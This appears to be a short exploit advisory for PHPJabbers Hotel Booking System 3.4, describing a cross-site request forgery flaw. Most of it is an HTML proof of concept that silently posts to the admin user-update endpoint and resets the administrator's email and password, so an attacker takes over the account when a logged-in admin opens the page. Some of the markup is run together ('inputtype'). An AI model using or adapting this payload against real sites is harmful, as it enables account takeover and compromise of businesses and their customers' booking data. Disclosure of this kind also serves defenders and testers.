# Exploit Title: Admin Account take over Via CSRF# Google Dork: N/A# Date: 17-12-2018# Exploit Author: Sainadh Jamalpur# Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/# Software Link: https://demo.phpjabbers.com/1545033057_422/index.php?controller=pjAdmin&action=pjActionIndex# Version: 3.4# Tested on: Windows x64/ Kali linux x64# CVE : N/A************************Description:**********************
The online hotel reservation system is built in PHP and uses MySQL to
store data. The script provides a powerful room booking and reservation
management functionality and allows you to install a clear
call-to-action tool on your hotel website which will impact conversions
and increase bookings. Our room booking system is highly customizable
and compatible with various website types.*************************Vulnerability Description:****************
An attacker can take the admin account via sending the Malicious link
to the authenticated user then the Victim clicks on the malicious link
then the admin password is change
************************************
PoC**************************************<html><body><script>history.pushState('','','/')</script><form action="https://site.com/admin/index.php?controller=pjAdminUsers&action=pjActionUpdate"
method="POST"><inputtype="hidden" name="user_update" value="1"/><inputtype="hidden" name="id" value="1"/><inputtype="hidden" name="role_id" value="1"/><inputtype="hidden" name="email" value="admin@admin.com"/><inputtype="hidden" name="password" value="pass1234"/><inputtype="hidden" name="name" value="Administrator"/><inputtype="hidden" name="phone" value=""/><inputtype="hidden" name="status" value="T"/><inputtype="submit" value="Submit request"/></form></body></html>